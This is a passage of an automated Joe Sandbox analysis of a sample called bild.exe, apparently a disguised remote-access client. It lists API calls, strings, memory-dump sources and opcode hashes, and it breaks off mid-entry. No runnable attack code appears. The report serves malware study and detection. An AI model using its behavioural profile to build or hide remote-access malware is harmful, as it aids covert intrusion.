                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressErrorFileLastModuleNameProc
                                                                                                              • String ID: GetModuleFileNameExA
                                                                                                              • API String ID: 4084229558-758377266
                                                                                                              • Opcode ID: fae3cca5aab7bb01e4c9b97f110b1a2db0a6dc79695f43f7a8bffe0b3de1597c
                                                                                                              • Instruction ID: 49f02229335bf729b7ee0896afa2c2f5c0b20361b19f4fa44f077bba46df288f
                                                                                                              • Opcode Fuzzy Hash: fae3cca5aab7bb01e4c9b97f110b1a2db0a6dc79695f43f7a8bffe0b3de1597c
                                                                                                              • Instruction Fuzzy Hash: 90F08272600228AFC720DFA8E904F5B77B8EB48711F004A2AF946D7640D671F810CBF1
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C794FC4
                                                                                                              • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C798E0D,00000000,?,6C798E0D,00000000,?,00000FA0,?), ref: 6C794FE4
                                                                                                              • SetLastError.KERNEL32(00000078,00000000,?,6C798E0D,00000000,?,00000FA0,?), ref: 6C794FED
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                              • String ID: EnumProcessModules
                                                                                                              • API String ID: 3858832252-3735562946
                                                                                                              • Opcode ID: d2c66561d5a254026318ade48d064b2ae2784c7d12be44934ce7dcc0d2edde19
                                                                                                              • Instruction ID: f4e5e5318ee19b1c0b2c264a17c83a5ba8542e514475efc4edc69aa5354a6293
                                                                                                              • Opcode Fuzzy Hash: d2c66561d5a254026318ade48d064b2ae2784c7d12be44934ce7dcc0d2edde19
                                                                                                              • Instruction Fuzzy Hash: 80F08C72600218AFC710DFA4E844E9B77A8EB48721F00C92AF95AD7A40C670F810DFA0
                                                                                                              APIs
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                                              • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                              • String ID: *AutoICFConfig$Client
                                                                                                              • API String ID: 3257255551-59951473
                                                                                                              • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                              • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                                              • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                                              • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterLeaveSleep
                                                                                                              • String ID: Push
                                                                                                              • API String ID: 1566154052-4278761818
                                                                                                              • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                              • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                                              • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                                              • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(6C7DB898,00000000,?,?,?,6C79DA7F,?,00000000), ref: 6C79A503
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 6C79A568
                                                                                                              • Sleep.KERNEL32(00000000,?,6C79DA7F,?,00000000), ref: 6C79A581
                                                                                                              • LeaveCriticalSection.KERNEL32(6C7DB898,00000000), ref: 6C79A5B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 4212191310-0
                                                                                                              • Opcode ID: e3e751350ea2c1dd82fbc77df704fbdf75d01e7d5001f5684124152aa7745bf7
                                                                                                              • Instruction ID: a30700ec742def1774ee70dc58aed6f064e67bbf2a1e06606b754e25bd725122
                                                                                                              • Opcode Fuzzy Hash: e3e751350ea2c1dd82fbc77df704fbdf75d01e7d5001f5684124152aa7745bf7
                                                                                                              • Instruction Fuzzy Hash: 6E213BB2F02200AFDF119F1DEA45796B7B8EF82329F111537D82693A00D771B840CB91
                                                                                                              APIs
                                                                                                              • GetCommandLineA.KERNEL32 ref: 00221027
                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 0022107B
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00221096
                                                                                                              • ExitProcess.KERNEL32 ref: 002210A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4178437972.0000000000221000.00000020.00000001.01000000.00000009.sdmp, Offset: 00220000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4178412002.0000000000220000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4178457146.0000000000222000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_220000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                              • String ID:
                                                                                                              • API String ID: 2164999147-0
                                                                                                              • Opcode ID: b03921397162599bd3c22ca2cf90c46cfdeb76d3b2028b2f5ee686d2ba9e3de1
                                                                                                              • Instruction ID: e9cdc2c0a68dd97cf724717e66a29ee58eb2d288783d83bc77519bfc4a5e0eba
                                                                                                              • Opcode Fuzzy Hash: b03921397162599bd3c22ca2cf90c46cfdeb76d3b2028b2f5ee686d2ba9e3de1
                                                                                                              • Instruction Fuzzy Hash: 0E1108204143E6BAEB315FE0A448FEABF956F32380F241044DCD596146C2524BFBC764
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 1314093303-0
                                                                                                              • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                              • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                                              • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                                              • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                                              APIs
                                                                                                              • ioctlsocket.WSOCK32(938234B3,4004667F,00000000,a3zl), ref: 6C795D1F
                                                                                                              • select.WSOCK32(00000001,?,00000000,?,00000000,938234B3,4004667F,00000000,a3zl), ref: 6C795D62
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ioctlsocketselect
                                                                                                              • String ID: a3zl
                                                                                                              • API String ID: 1457273030-354920636
                                                                                                              • Opcode ID: 0d72d3e7d41b2b741f3fc031d4b8ec8b7c3a75ed1c4af805089d2d047bbe3884
                                                                                                              • Instruction ID: 1c664c7351992c7dd37fae545484bdf40b63ff2bde2d975d55a385f982d589b7
                                                                                                              • Opcode Fuzzy Hash: 0d72d3e7d41b2b741f3fc031d4b8ec8b7c3a75ed1c4af805089d2d047bbe3884
                                                                                                              • Instruction Fuzzy Hash: 5D214170A012189BEB28DF14D9597EDB7B9EF48304F0081EAE80DA7681DB745F98DF90
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Pictures\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CurrentFileModuleNameProcess
                                                                                                              • String ID: C:\Users\Public\Pictures\bild.exe
                                                                                                              • API String ID: 2251294070-2296423061
                                                                                                              • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                                              • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                                              • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                                              • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                                              APIs
                                                                                                              • _malloc.LIBCMT ref: 1110F4A9
                                                                                                                • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                              • _memset.LIBCMT ref: 1110F4D2
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                                              • String ID: ..\ctl32\Refcount.cpp
                                                                                                              • API String ID: 2803934178-2363596943
                                                                                                              • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                                              • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                                              • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                                              • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                              • String ID: \\.\NSWFPDrv
                                                                                                              • API String ID: 3498533004-85019792
                                                                                                              • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                                              • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                                              • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                                              • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _calloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1679841372-0
                                                                                                              • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                                              • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                                              • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                                              • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 6C798FE4
                                                                                                              • getsockname.WSOCK32(?,?,00000010,?,03092EE8,?), ref: 6C799005
                                                                                                              • WSAGetLastError.WSOCK32(?,?,00000010,?,03092EE8,?), ref: 6C79902E
                                                                                                                • Part of subcall function 6C795840: inet_ntoa.WSOCK32(00000080,?,00000000,?,6C798F91,00000000,00000000,6C7DB8DA,?,00000080), ref: 6C795852
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                              • String ID:
                                                                                                              • API String ID: 3066294524-0
                                                                                                              • Opcode ID: 45f47fed89036b81be473805ecd1512bbaa9925ef9453195f82f36baf2d34e78
